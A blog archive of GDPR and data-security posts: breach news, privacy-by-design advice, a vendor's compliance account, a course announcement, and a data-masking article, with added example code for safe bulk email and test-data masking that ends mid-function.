Category Archives: GDPR

Latest on the Currys PC World Data Breach Impacting 10 Million Customers

Following further investigations, Currys PC World today confirmed that the personal details of 10 million of its customers may have been stolen by hackers, a revised figure from the 1.2 million customer records and 5.9 million payment cards it disclosed back in June.

In June 2018, the company said there had been "an attempt to compromise" 5.9 million credit and debit cards, but that only 105,000 cards without chip-and-PIN protection had been leaked after hackers attempted to access the company's payment processing systems.

The hack is said to have occurred nearly a year before it was disclosed, so either it went undetected, which is common where there is inadequate security monitoring in place, or the business knew about the breach but chose not to disclose it to the affected customers.

The Information Commissioner's Office (ICO) fined Dixons Carphone £400,000 for a 2015 data breach; however, Currys PC World stated that the two incidents were not connected.

The business stressed that it has now improved its security measures, including enhanced controls, monitoring and testing to safeguard customer information, and is "trebling" its investment in cybersecurity. Unfortunately, no details have been disclosed explaining how the hackers were able to access such large quantities of personal data. The company's "security improvement" statement suggests its IT security was rather underfunded and not at a sufficient standard to adequately secure its business operations and customer data.

The ICO and the NCSC both released statements about the breach in June. So we'll see what the ICO makes of it, but I think the business is likely to be fined again, although not the potentially massive GDPR penalties, as this data breach occurred before the GDPR came into force in May 2018.

Customer statement issued by Currys PC World to its customers today:

On June 13, we began to contact a number of our customers as a precaution after we found that some of our security systems had been accessed in the past using sophisticated malware.

We promptly launched an investigation. Since then we have been putting further security measures in place to safeguard customer information, increased our investment in cyber security and added additional controls. In all of this we have been working intensively with leading cyber security experts.

Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017. This unauthorised access to data may include personal information such as name, address, phone number, date of birth and email address.

While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and we have no confirmed instances of customers falling victim to fraud as a result. We are continuing to keep the relevant authorities updated.

As a precaution, we are letting our customers know to apologise and advise them of protective steps to take to minimise the risk of fraud. These include:

If you receive an unsolicited email, letter, text or phone call asking for personal information, never reveal any full passwords, login details or account numbers until you are certain of the identity of the person making the request. Please do not click on any links you do not recognise.

If you think you have been a victim of fraud you should report it to Action Fraud, the UK’s national fraud and internet crime reporting centre, on 0300 123 2040*.

We also recommend that people are vigilant against any suspicious activity on their bank accounts and contact their financial provider if they have concerns.

We take the security of your data extremely seriously and have previously announced that we have taken action to close off this access and have no evidence it is continuing. Nevertheless, we felt it was important to let customers know as soon as possible.

We continue to make improvements and investments to our security systems and we’ve been working round the clock to put this right. We’re extremely sorry about what has happened – we’ve fallen short here. We want to reassure you that we are fully committed to protecting your data so that you can be confident that it is safe with us.

5 Ways Privacy by Design Can Rebuild Consumer Trust

Among the many requirements of the General Data Protection Regulation (GDPR) is a directive to implement new systems of “privacy by design and default.” In this post-GDPR era, the practice may turn out to be more than a mandate. True privacy by design could be a timely opportunity to engage and empower customers.

According to an April 2018 survey by IBM and Harris Poll, 78 percent of U.S. respondents said that an organization’s data privacy capabilities are “extremely important,” while only 20 percent “completely trust” those companies whose products they use. The findings of a 2017 study by software corporation SAP found that 79 percent of consumers will disengage from a brand if their data is used without consent or knowledge.

These attitudes expose a vast opportunity in making the shift to privacy by design and default. Adopting transparency around data privacy practices could provide the chance to rebuild customer trust and develop lasting relationships.

What is Privacy by Design?

The concept of “privacy by design” was introduced by Ann Cavoukian in the 1990s. She presented outlining principles for proactively incorporating data protection into systems and operations from the ground up. It was imperative, she wrote in her paper, that privacy “become integral to organizational priorities, project objectives, design processes and planning operations.”

From the user’s perspective, according to Cavoukian, the organization is responsible for establishing “openness and transparency … relating to the management of personal information.” The privacy by design mandate in the GDPR was directly influenced by Cavoukian’s work.

Even beyond very costly GDPR fines, there’s enormous risk in failing to adopt secure design. According to a June 2018 Ponemon Institute study, 74 percent of IT security practitioners say it’s “likely” their company had a security incident in the last year because of their digital transformation processes.

The Key: Respect for the Individual

Openness and transparency would require a transition of practice and priority from meeting disclosure requirements to genuine education, including the adoption of language that makes sense to the user.

“Until now, the average consumer was likely unaware that when they ‘turn on cookies’ it means they are agreeing to share their information with dozens — and, in some cases, hundreds — of affiliated partners. Those days are over,” wrote Kevin Cochrane in the Harvard Business Review.

At the core of Cavoukian’s content on privacy by design is the concept of “respect for the individual.” Organizations are well-served to consider the role of the user-centred design principles outlined in ISO 13407 (superseded by ISO 9241-210 in 2010) from the International Organization for Standardization (ISO), in which a key goal identified is “empowering the user.”

When privacy by design is achieved in the enterprise, customers should feel confident about how personal data is used and kept secure, how artificial intelligence (AI)-based recommendations are generated and how to revoke personal data at any time.

Five Ways to Rebuild Customer Trust

With consumer trust at historic lows, chief information security officers (CISOs) should view privacy by design as more than just a regulatory directive. When put into practice, genuinely user-centric, privacy-focused design practices can provide the groundwork for meaningful customer relationships.

The following are examples of ways the enterprise can embrace the GDPR’s directive to adopt privacy-based design and make these business practices apparent to the public.

1. Adopt Smarter Identity and Access Management (IAM)

A key opportunity for organizations to reduce friction in their users’ experiences while improving data privacy is through the adoption of smarter solutions for IAM.

Eight out of 10 hacking-related breaches involve weak or stolen credentials, according to the 2017 Data Breach Investigations Report from Verizon, and password reuse remains an undisputed problem. Enabling trust-based access through interoperable credentials, biometrics and multi-factor authentication represents a shift in IAM practices — and it’s a viable solution to password fatigue.

2. Prioritize Risk-Aware Authentication

Consumers are increasingly aware of the risks of password-based authentication methodologies, according to a January 2018 study by IBM — their survey of 4,000 consumers’ priorities found that security ranked higher than convenience, especially when it relates to money-based applications.

Organizations who adopt risk-aware authentication solutions for user detection and new account creation may have an advantage when it comes to both customer trust and risk mitigation.

Read the complete IBM Study on The Future of Identity and Authentication

3. Emphasize Customer Benefits

When data is being collected for personalization algorithms, it’s imperative to educate the consumer on how data-sharing can improve their experience through continual customer education efforts built into the user experience.

An August 2017 study by Pegasystems on consumer attitudes toward AI found that 70 percent are open to AI if it can provide some distinct value, such as saving the customer money or time. However, 88 percent demand that businesses are “more open about where AI is currently being used while also showcasing how it improves the customer experience.”

4. Offer Value in Exchange for Data Shared

You don’t need to limit the value you provide the customer to brand-specific purchases. When possible, data shared by customers should provide value across brand interactions. For example, customers of VineSleuth are provided with free, on-demand access to their algorithmically-generated personal wine taste profiles to share with friends and inform wine purchases outside the app.

5. Provide On-Demand Access to Data

While GDPR Article 15 details the “[r]ight of access by the data subject,” brands should consider implementing on-demand access. Cochrane recommends the inclusion of tools for managing privacy and data sharing within customer applications. The in-app customer data privacy center could include the ability for the individual to review their consent, update specific data permissions and download the sum total of data shared at any time.

While many security leaders are struggling to gain footing and update processes in the post-GDPR era, it’s valuable to consider the customer’s perspective.

Enterprises which embrace the directive to practice privacy by design have an opportunity for more secure authentication and access management, meaningful customer education and better data privacy. The results will likely not only shift data-dependent organizations toward design practices which balance UX with privacy compliance, but also offer the opportunity to rebuild critical customer trust and relationships.

The post 5 Ways Privacy by Design Can Rebuild Consumer Trust appeared first on Security Intelligence.

Is Facebook Doing Really That Badly?

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets

Founded by Mark Zuckerberg in February 2004, Facebook (NASDAQ:FB) is the world’s largest social network. On Thursday, after the earnings report, Facebook stocks went down by almost 20%; the company’s revenue was higher compared to the previous quarter, but the report did not meet expectations. In fact, this happens quite […]

The post Is Facebook Doing Really That Badly? appeared first on Hacked: Hacking Finance.

Onwards and Upwards: Our GDPR Journey and Looking Ahead

At Imperva, our world revolves around data security, data protection, and data privacy.  From our newest recruits to the most seasoned members of the executive team, we believe that customer privacy is key.

For the better part of the last two years, Imperva has laid the foundation for our compliance with the EU General Data Protection Regulation (GDPR).  At roughly ninety pages with 173 recitals and 99 articles, it’s a massive regulation that fundamentally shifts the data privacy and data protection universe.

Also read: Monitoring Data & Data Access to Support Ongoing GDPR Compliance

We at Imperva are proud of what we’ve accomplished in this time.  As the lead for Imperva’s Privacy Office, I can candidly say that our success has been made possible only through the combined efforts of the entire organization. Thank you to our many Privacy Champions that have actively engaged within their departments and teams.

And a special thanks to our many critical internal partners, including our CMO David Gee, for his humorous evangelizing of data privacy initiatives, our Director of InfoSec, Noam Lang, our CIO, Bo Kim, who was also our first-ever privacy champion, and our CEO, Chris Hylen, for all having supported and prioritized data privacy initiatives within Imperva.

Just the beginning

Our work to comply with GDPR represents only the start of Imperva’s journey to protect, and to create products that protect, the data privacy of our customers and their users.  Already, Imperva is proactively building on our GDPR work and looking to ‘infinity and beyond’. Part of that ‘beyond’ is our monitoring and preparation for other game-changing regulations such as the EU ePrivacy Regulation and the California Consumer Privacy Act.

A Successful Launch

Imperva has launched significant enhancements to our data privacy and data security programs and environments to account for new obligations under GDPR.

  • Governance: We have formalized and expanded the governance structure of the data privacy function within Imperva, including the creation of a dedicated Privacy Office.  This updated governance structure has been integrated into our annual third-party certification audits and reviews.
  • DPIAs:  We have expanded our standard internal Privacy Impact Assessment process to trigger additional Data Protection Impact Assessments when appropriate.
  • Security Environments: We have long maintained several common certification frameworks via third-party audits, including ISO 27001, the PCI Data Security Standard, and SOC 2 Type II reporting.  As part of ensuring that our robust environments remain secure, we mapped our GDPR infosec obligations to our existing control frameworks to ensure we meet all GDPR obligations on an ongoing basis.
  • Updated Privacy Notices:  We updated the privacy policies on our web properties to reflect the changes we’ve adopted under GDPR. Additionally, we’ve refreshed our cookie consent banners and cookie policies for those in the European Union.
  • Customer Agreements: In order to facilitate streamlined customer onboarding, we’ve created ready-to-sign Data Processing Agreements (DPAs) that provide details about what personal data an Imperva product or service collects in order to provide that service.  These DPAs utilize the controller-processor model clauses approved by the EU Commission and address customer concerns about how cross-border data transfers are GDPR-compliant.
  • Data Subject Requests: We’ve rolled out a new data subject request portal on our web properties.  Additionally, we’ve worked with each Imperva department to ensure smooth operational processing of data subject rights, including access, rectification, and erasure.

To Infinity

We here at Imperva have not been satisfied by merely meeting our obligations.  We are making data privacy a priority. As a security company, data privacy is mission critical.  It’s part of earning and maintaining the trust of our customers and employees.

Even Better Products: Our Product teams have worked hard to re-architect infrastructure to enable regional storage of logs.  This new feature makes compliance with GDPR far easier for customers or their subsidiaries operating primarily within a single geographic region by reducing cross-border data transfers.  Additionally, regional log storage enables genuine conformity with data localization and data residency laws, such as those in China, Canada, Germany, Russia, and South Korea.

Embedded Privacy Champions: We’ve ramped up our program to embed mini privacy subject matter experts within each department. Today, three percent of our workforce are privacy champions thinking about how to protect your personal data. And that number is growing.

Privacy Guidance Down to Departments: The Privacy Office has worked with each department to create individual departmental policies and operational guidance to ensure that Imperva employees in every role know how to safeguard and protect personal data.

Vendor Management: We’ve reviewed dozens of vendors across all product lines to ensure we have the appropriate data privacy and security provisions, data processing agreements, and standards in place to safeguard our customers’ personal data.  Our subprocessors page on our web properties provides additional information about third-party service providers.

And Beyond!

Imperva has aimed high when it comes to the obligations created by GDPR, but we’re also looking far beyond.

In particular, Imperva is keeping a close eye on new data privacy laws and updates coming down the line that could impact our customers’ data privacy obligations, and therefore our obligations to you—such as the EU ePrivacy Regulation, which is intended to replace the 2002 ePrivacy Directive (as amended in 2009), as well as the California Consumer Privacy Act, which takes effect on January 1, 2020.

GDPR is a significant milestone in the data privacy universe and so too in Imperva’s journey, yet it’s important to recognize it as a milestone and not as an endpoint.  GDPR represents only the start of Imperva’s journey to protect and to create products that protect the data privacy of our customers and their users.

Achieving compliance: GDPR, CCPA and beyond

AB 375, or the California Consumer Privacy Act (CCPA) of 2018, was signed into law by California Governor Jerry Brown on June 28, 2018 and is recognized as one of the toughest privacy laws in the U.S. The statute requires companies to disclose to California residents what information is being collected on them and how it will be used. Companies have 18 months to prepare for this new law to go into effect; it’s set to … More

The post Achieving compliance: GDPR, CCPA and beyond appeared first on Help Net Security.

How rogue data puts organisations at risk of GDPR noncompliance

The GDPR compliance deadline came into force on 25th May 2018 and applies to all organisations processing and holding the personal information of data subjects. This includes contacts such as customers, partners and patients. Much has been written about the immense efforts of organisations to improve their data privacy procedures in order to comply with GDPR, but there is a largely undiscussed oversight lurking just under the surface which, if left unaddressed, still leaves … More

The post How rogue data puts organisations at risk of GDPR noncompliance appeared first on Help Net Security.

The New Age of Accountability

The EU has been busy in the cybersecurity department, and for good reason. Given Europe’s ever-rising cybercrime rates, a new approach to data protection was in order. This cued the

The post The New Age of Accountability appeared first on The Cyber Security Place.

It’s time to relook at, rethink and then restructure our fragmented IT security landscape

GDPR and the NIS Directive present the perfect opportunity to eliminate tool bloat at your organisation. The run-up to Brexit has led to a boost in wages for professionals of

The post It’s time to relook at, rethink and then restructure our fragmented IT security landscape appeared first on The Cyber Security Place.

GDPR has made life easier for cybercriminals

Removal of PII data from Whois records makes protecting Internet users increasingly difficult for security professionals. New research conducted by domain name and DNS-based cyber threat intelligence firm DomainTools has revealed that

The post GDPR has made life easier for cybercriminals appeared first on The Cyber Security Place.

Five network security threats facing retail – and how to fight them

Digital networks are now the backbone of every retail operation. But they are also a very attractive target for cyber criminals. Paul Leybourne of Vodat International examines the key cyber

The post Five network security threats facing retail – and how to fight them appeared first on The Cyber Security Place.

Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do

We are in the midst of a digital transformation. And yet, IT departments are struggling to develop a digital strategy that addresses data privacy and cybersecurity. In a world where the General Data Protection Regulation (GDPR) is now in effect, the lack of such a strategy could end up coming back to haunt your organization and its leadership.

The Greatest Challenge Facing Digital Strategy Leadership

According to a June 2018 Harvey Nash/KPMG CIO Survey, the greatest challenge facing security and information technology leadership is the ability to deliver dynamic data while simultaneously providing a high level of security and privacy.

Only 32 percent of organizations have a company-wide digital strategy, the same survey found, and of those, 78 percent admit that the strategy in place is moderately effective at best. These insights suggest that much of the data flowing through organizations, including the personal information of customers, isn’t getting the level of protection necessary to satisfy GDPR compliance.

Jumping Into the Digital Transformation Too Fast

Let’s face it, most companies are failing or falling behind when it comes to cybersecurity — and the ongoing digital transformation is only exacerbating the situation. The Harvey Nash/KPMG survey states IT departments are doing fine when it comes to traditional technologies, but it also recognizes the increasing complexity that digital technologies bring to organizations.

Understanding these technologies is part of the problem — not only how they work, but also how they’ll best improve the nature of the business. It might be tempting to apply the latest and greatest available technology, whether you need it or not.

IT staff are often risk-takers — they like new technology and want to use it right away. Where they run into trouble is bringing in the latest technology without a real strategy to implement it both wisely and securely. Just because IT wants to update its technology doesn’t mean the company is ready for it.

Too Much Data, Not Enough Security

Understanding how a technology’s abilities intersect (or don’t) with a business’s needs makes the difference between a successful transformation and digital nightmare. Whether the technology is a boon or bust for the company, there is one thing it is guaranteed to do: generate more data — which will require layers of security. Without an effective digital strategy, understanding and protecting that data becomes problematic.

If the data were stored in one location, it might be easier to manage. But with the increasing diversity of technologies, from the Internet of Things (IoT) and cloud computing to blockchain and virtual reality (VR), a single company’s data is now spread across thousands of endpoints. This reality is leading to an increased risk of data breaches.

“[W]ith the emergence of these transformative technologies the perimeter has become dynamic and ever-changing,” wrote Peter Galvin, chief strategy and marketing officer at Thales eSecurity. “[W]hile protecting the perimeter is still important, it simply is not enough to prevent sensitive data from being stolen.”

Getting Leadership on Board

A strong digital strategy will provide the layers of security and privacy needed in the digital transformation, but this requires cooperation from all levels of leadership. Just as IT departments have a responsibility to be more business-aware and recognize how new technologies fit (or don’t fit) into corporate strategies, boards of directors must be more realistic about creating digital strategies that will meet today’s and tomorrow’s privacy concerns.

In the past, the fallout from data breaches and other security incidents fell directly on C-suite employees: Chief executive officers (CEOs), chief information officers (CIOs) and chief information security officers (CISOs) have been held accountable by directors. However, the responsibility often falls on the board to approve budgets, support cybersecurity funding and efforts and create corporate strategies.

Thanks to GDPR — and rising security and privacy threats — boards may finally be getting the message. The Harvey Nash/KPMG survey found that boardrooms are increasingly prioritizing security. In fact, security has received the most significant increase in business priority over the past year.

And according to Board Effect, more boards are expanding to bring cybersecurity experts directly to the table as full members.

“Cybersecurity experts on the board have the proper expertise to advise the board about the best tools, processes and resources to keep hackers at bay,” the publication stated. “In addition, cybersecurity experts are the prime resource people for identifying new developments in IT as technology advances.”

This shift is promising for security professionals. With a digital perspective integrated directly into board decisions, IT departments should gain the leverage necessary to lobby for tools and support they need to meet the digital transformation with an adequate strategy to keep data secure.

Read the study from Ponemon Institute: Bridging the Digital Transformation Divide

The post Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do appeared first on Security Intelligence.

GDPR Hurts Security but Publicity Might Help

A survey of 900 security professionals conducted by AlienVault at Infosecurity Europe found that spending on GDPR compliance efforts has hindered threat detection but cybersecurity publicity might actually benefit the industry. Additionally,

The post GDPR Hurts Security but Publicity Might Help appeared first on The Cyber Security Place.

New Pluralsight Course: The State of GDPR – Common Questions and Misperceptions



I love so many of the underlying principles of GDPR as it relates to protecting our personal data. I love the idea of us providing it for a specific purpose and it not being used beyond that. I love that it seeks to give us more control over access to (and erasure of) our data. I also love that the regulation has the potential to seriously bite organisations that don't protect it. You'd be hard pressed to find anyone who disagrees with any of that.

However, there are many things I dislike about the narrative around GDPR. I dislike the confusion around so many aspects of the regs. I dislike the barrage of emails I got as we approached (and passed) May 25. And I especially dislike the aggressiveness with which so many people have pushed their interpretation of it. It's almost as if GDPR is being used as a weapon to attack rather than a tool to protect - let me give you a perfect example:

In the final days before the regs hit, Ghostery was trying their utmost to do the right thing yet somehow committed that cardinal sin so many of us have come close to doing before - putting all the recipients in the "to" line instead of "bcc":

An honest (and highly embarrassing) mistake no doubt, but how did a bunch of people react? By jumping up and down and claiming that Ghostery would now be hit with a €20M fine (or 4% of gross annual worldwide turnover, should that be a larger number). Most rational people with an inkling of common sense would know that's simply not going to happen; an organisation making a simple mistake whilst trying to do the right thing and then handling the subsequent communications in an ethical and responsible fashion is not going to get hit with the full whack of GDPR reserved for the worst offenders.
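The "to" instead of "bcc" footgun above is worth seeing in code, because it is a property of how the message is built rather than of the mail server. The example below is added here and is not Ghostery's code or anything from the original post; the three recipient addresses and the sender are constructed for illustration. It shows the leaky message (every recipient in the visible To header), a safe variant that keeps the recipient list in the SMTP envelope only, a one-message-per-recipient variant, and a pre-send check that refuses any message exposing more than one address. The SMTP call is passed in as a callable so the example runs offline.

```python
"""Added example: building a mass privacy notification without exposing
the recipient list. Not taken from the original post; addresses are
constructed sample data."""
from email.message import EmailMessage
from email.utils import getaddresses

# Constructed sample recipient list (hypothetical addresses).
RECIPIENTS = [
    "alice@example.org",
    "bob@example.net",
    "carol@example.com",
]
SENDER = "privacy@example-sender.test"  # hypothetical sender
SUBJECT = "Important update about your data"
BODY = "Hello,\n\nWe are writing to let you know about a change to our privacy policy.\n"


def build_leaky_message(recipients):
    """The mistake: every recipient lands in the visible To header, so each
    person receiving the mail can read everyone else's address."""
    msg = EmailMessage()
    msg["From"] = SENDER
    msg["To"] = ", ".join(recipients)
    msg["Subject"] = SUBJECT
    msg.set_content(BODY)
    return msg


def build_safe_message(recipients):
    """The fix: visible headers carry no real recipient (an empty RFC 5322
    group), and the recipient list is returned separately so it goes only
    to the transport as RCPT TO commands and is never serialised into the
    message bytes."""
    msg = EmailMessage()
    msg["From"] = SENDER
    msg["To"] = "Undisclosed recipients:;"
    msg["Subject"] = SUBJECT
    msg.set_content(BODY)
    return msg, list(recipients)


def build_individual_messages(recipients):
    """Alternative fix: one message per recipient, each with a single To."""
    messages = []
    for rcpt in recipients:
        msg = EmailMessage()
        msg["From"] = SENDER
        msg["To"] = rcpt
        msg["Subject"] = SUBJECT
        msg.set_content(BODY)
        messages.append(msg)
    return messages


def visible_recipients(msg):
    """Addresses that every recipient will be able to see. A Bcc header is
    counted too: if one survives into the message bytes it is just as
    visible as To."""
    found = []
    for field in ("To", "Cc", "Bcc"):
        for value in msg.get_all(field, []):
            found.extend(addr for _name, addr in getaddresses([str(value)]) if addr)
    return found


def leaks_recipient_list(msg):
    """True if more than one address is exposed in the visible headers."""
    return len(visible_recipients(msg)) > 1


def send(smtp_sendmail, msg, envelope_recipients):
    """Hand the real recipient list to the transport, not the headers.
    smtp_sendmail has the signature of smtplib.SMTP.sendmail and is passed
    in so this example needs no network; the guard refuses to send a
    message that would expose the list."""
    if leaks_recipient_list(msg):
        raise ValueError("refusing to send: recipient list visible in headers")
    return smtp_sendmail(SENDER, envelope_recipients, msg.as_bytes())


if __name__ == "__main__":
    leaky = build_leaky_message(RECIPIENTS)
    print("leaky message exposes:", visible_recipients(leaky))
    safe, rcpts = build_safe_message(RECIPIENTS)
    print("safe message exposes:", visible_recipients(safe))
    # Stand-in for smtplib.SMTP.sendmail: record the envelope, send nothing.
    send(lambda s, r, d: print("envelope RCPT TO:", r) or {}, safe, rcpts)
```

The guard in `send` is the check worth keeping in any bulk-notification tool: whatever builds the message, the last thing before the transport call is to confirm that no more than one address is visible in the headers.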

Here's another one which invoked a similar set of GDPR-related commentary:

After the ViewFines data breach, I had a number of people flagging the South African company's GDPR obligations. Yes, they're well and truly outside of the EU but hey, they could have some Europeans' data in there ergo they'll be pinged under GDPR, right? But think it through: here we have a company operating in a (very) foreign jurisdiction whose sole purpose is to process traffic fines. You have to be in the country for them to have your data end up in their system! And just before you shout "but extraterritoriality", it's not just whether a legal provision exists (it does), there's the very important question of whether it has any chance of being enforced. Will a regulatory authority in the EU be able to successfully take action against a company in South Africa if, say, someone from France went on a holiday there and copped themselves a speeding fine? What does common sense tell you?

Which brings me to the new course and I put precisely this question to John Elliott whilst in London last month, only a couple of weeks after GDPR had hit. I've known John for a while via Pluralsight channels and we recorded 2 courses together that day, this one and another I'll announce after it goes live. John is the best possible person I could think of to create a course of this nature: he's a qualified Data Protection Officer for one of Europe's largest brands, has a privacy degree and also an infosec background. Plus - and this is the really critical bit - he explains GDPR in a way that makes sense! I expressed my dismay earlier on at how difficult so many people seem to be making a regulation that has such commendable objectives but every time I speak to John about it, he cuts right through to the point and makes it dead simple to understand in ways I've just not seen anyone do before.


We talk specifically about cases like ViewFines and a rental car company in New Zealand. We cover how media outlets have been blocking folks from the EU and look at the way various organisations have been tackling their privacy policies. Of course, we also talk about penalties too and what levels will likely apply in what cases, plus how they'll be enforced in jurisdictions outside the EU too. John also has some great resources to help people understand GDPR and indeed some really neat examples of where communication has been done exceptionally well.

Lastly, as I mentioned last week, I've also formally engaged John to help ensure Have I Been Pwned complies with GDPR. Some things are trivial (in fact, things that I didn't expect would be) and other things require more work. It's a significant investment on my behalf to do this too but I honestly couldn't think of anyone better than John to do it. I'll share a heap more information later on, I'm sure you'll get a bit of a sense of some of the approaches we'll be taking after listening to John in this video.

We wanted to produce this course now - after GDPR was in action - so that we could have a narrative on what we're learning since it's come into effect. There's a million resources telling everyone all the things they should and should not do (and a good whack of those disagreeing with each other too), this course is a fresh take on things and is far more focused on what's actually happening than it is speculating how the regs will be enforced.

The State of GDPR: Common Questions and Misperceptions is now live on Pluralsight!

Only 20% of companies have fully completed their GDPR implementations

Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation. EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end …

The post Only 20% of companies have fully completed their GDPR implementations appeared first on Help Net Security.

Need for Speed: Optimizing Data Masking Performance and Providing Secure Data for DevOps Users

Let’s start with a pretty common life experience — you identify a need (e.g., transportation), you evaluate your options (e.g., evaluate car manufacturers, various features, pricing, etc.), and you decide to purchase (e.g., vehicle X). This process repeats itself over and over again regardless of the purchase. What typically happens following the purchase decision is also equally likely and transferable — that is: How do I improve it? Increase efficiency? Can I tailor it to my individual needs?

For most technology purchases, including those related to data security — and data masking in particular — the analogy holds equally true. For many of our data security customers, the desire to optimize the throughput, run-rate, or outputs of the solutions they invest in is becoming increasingly important as they race to achieve regulatory compliance with key data privacy requirements and regulations such as the European Union (EU)-wide General Data Protection Regulation (GDPR), HIPAA, or PCI-DSS. Equally important, most organizations are looking to mitigate the risk of sensitive data exposure and optimize their DevOps function, allowing more end-users to access data for test and development without the risk associated with using real sensitive data. And they want all this to be achieved FASTER.

Imperva offers a variety of data security solutions to support these increasingly common organizational challenges, including Imperva Camouflage. Our industry-leading data masking solution and best practice implementation process offer a one-stop means to achieve compliance support and reduce data risks in DevOps, while meeting end-user processing expectations. Simply put: the process involves the use of a production database copy, upon which the data is classified for masking, and transformation algorithms are then applied to produce fictional — but contextually accurate — data that is substituted for the original source data; all done in an expeditious manner to meet the need for speed.

You’ve decided you need data masking, but your end-users want more

In previous blogs and webinars, we highlighted the value that data masking provides for protecting data privacy and supporting industry and regulatory compliance initiatives. Industry analysts continue to see ongoing and expanding use cases and demand for the technology. This is largely because the volume of data organizations capture and store, and sensitive customer data in particular, continues to grow. Further, changing data applications and database types, migration to the cloud (for DevOps), privacy regulations that require de-identified data, and the growth of big data applications and the variety of data use cases all combine to drive the need for data masking technologies and their diversification and advancement.

So, organizations are seeing the value of data masking, and many have implemented it into their overall data security strategies to provide yet another critical layer. That said, they are also demanding increased speed of masked copy processing and provisioning to ensure their DevOps teams continue to deliver on business-critical processes. How then can data masking be optimized? Let’s first take a look at typical performance considerations, and then review how the process can be optimized for end-users.

How do you measure data masking ‘performance’?

One of the most common questions asked during a sales cycle, POC or implementation relates to the length of time it will take to mask data, and how that performance is measured. The quick answer is ‘it’s complicated’. Data Masking run-rate performance is typically measured in rows per second. This is the metric most often cited by our customers, but the underlying size of a row can and does vary significantly depending on how wide the particular tables are, therefore impacting performance comparison.

Additionally, the variance in data volumes and data model complexity makes it challenging to provide specific performance numbers; these are batch processes that modify large amounts of data (discovery excepted) and therefore consume a significant amount of time when the data set is large. That said, Imperva offers a number of avenues to optimize performance for a given customer’s requirements, and in most cases the configuration can be reverse engineered from the desired performance or run-time target. We’ll get into the specifics on this shortly.

Aside from the inherent capabilities of the software solution itself, there are several factors that influence the performance of data masking that we discuss with our customers. We also explain that the various combinations of these make it challenging for any vendor to pinpoint exact masking run times. We’ve consolidated the performance-impacting variables into three key areas: database characteristics, hardware requirements, and masking configurations. Let’s review each of these:

  1. Database characteristics:

In general, a large database takes longer to mask than a small database: pretty simple! To be more specific, the height and width (row count and columns per row) of the tables in the database being masked directly impact the runtime. Tall tables, with high row counts, have more data elements to process compared to shorter tables.

In contrast, wide tables containing extraneous non-sensitive information introduce I/O overhead throughout the data transformation process, because the non-sensitive columns are still moved, in part, during the transformation even though they are not masked. This makes the input of the DevOps SMEs key to assessing the underlying databases and helping scope the performance requirements.

  2. Hardware Requirements:

Data masking can be a relatively heavy process on the database tier in that it copies and moves a significant amount of data in many cases. As we employ our best practice implementation process using a secure staging server, this introduces yet another variable that influences throughput, but also an opportunity. The processing power and I/O speed of the database staging tier greatly influence the performance, regardless of the vendor or solution being deployed. When we provide base hardware specifications to customers for the staging server, we make this clear. We also help by providing a range of hardware options depending on the underlying environment characteristics and end-user requirements, noting that where SLA windows for masking are tight, appropriate hardware should be provisioned to accommodate them. The good news is that this is an easy configuration, and most customers already have access to all the tools they need to size their staging server to their specific requirements.

  3. Masking Configurations within the projects:

The details of the security and data masking requirements, which are driven by the organization, also influence performance. In particular, the amount and complexity of the masking being applied have an impact on masking run times. From our experience, in cases where typical sensitive data element types require masking, the data resides in 15% – 20% of the tables. If higher security requirements are imposed and additional data elements are included, this could expand to include as many as 30% – 40% of the tables.

In addition to the volume of data being masked, the specific data transformations also influence the runtimes. There are different types of data transformers, and they each have different performance characteristics based on the manner in which they manipulate data. For example, ‘Data Generators’ synthesize fictitious values such as credit card and phone numbers, whereas ‘Data Loaders’ substitute data drawn from defined sets, such as shuffled names and addresses. The business needs usually dictate which transformer should be used for a given data element, but sometimes the business requirement can be met by more than one transformer. In those cases, the option chosen can have an impact on performance.
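As an added illustration of the two transformer types described above (this is example code written for this page, not Imperva Camouflage code), the following in-memory masker applies a ‘Data Generator’ for card and phone numbers and a ‘Data Loader’ for names, and reports the rows-per-second metric the post discusses. It goes one step beyond the text: the loader picks the replacement with a keyed hash of the original value (an assumption of this example) so the same real name masks to the same fake name in every table, keeping joins in the masked DevOps copy intact; the sample rows, name set and key are all constructed.

```python
import hashlib
import random
import re
import time
from typing import Callable, Dict, List

Row = Dict[str, str]
# A transformer maps (rng, original value) -> masked value.
Transformer = Callable[[random.Random, str], str]


def luhn_check_digit(partial: str) -> str:
    """Luhn check digit for a digit string, so generated card numbers pass format checks."""
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:  # every second digit from the right (of the full number) is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    digits = re.sub(r"\D", "", number)
    return len(digits) > 1 and luhn_check_digit(digits[:-1]) == digits[-1]


def generate_card(rng: random.Random, original: str) -> str:
    """'Data Generator': a fictitious, Luhn-valid card number with the original's length and grouping."""
    digits = re.sub(r"\D", "", original)
    body = "".join(rng.choice("0123456789") for _ in range(len(digits) - 1))
    new_digits = iter(body + luhn_check_digit(body))
    return re.sub(r"\d", lambda _m: next(new_digits), original)


def generate_phone(rng: random.Random, original: str) -> str:
    """'Data Generator': replace every digit but keep separators so the format survives."""
    return re.sub(r"\d", lambda _m: rng.choice("0123456789"), original)


def make_loader(values: List[str], key: bytes) -> Transformer:
    """'Data Loader': substitute a value from a defined set.

    The choice is a keyed hash of the original (an assumption of this example, not a
    documented product feature), so identical inputs mask identically across tables
    without keeping any mapping back to the real value."""
    def loader(_rng: random.Random, original: str) -> str:
        digest = hashlib.sha256(key + original.encode("utf-8")).digest()
        return values[int.from_bytes(digest[:4], "big") % len(values)]
    return loader


def mask_table(rows: List[Row], config: Dict[str, Transformer], seed: int = 0):
    """Mask the configured columns of every row; returns (masked_rows, rows_per_second).

    Each whole row is copied, mirroring a staging process that moves every column: that is
    why wide tables with many non-sensitive columns add I/O although only a few are masked."""
    rng = random.Random(seed)
    start = time.perf_counter()
    masked: List[Row] = []
    for row in rows:
        new_row = dict(row)
        for col, transform in config.items():
            if col in new_row:
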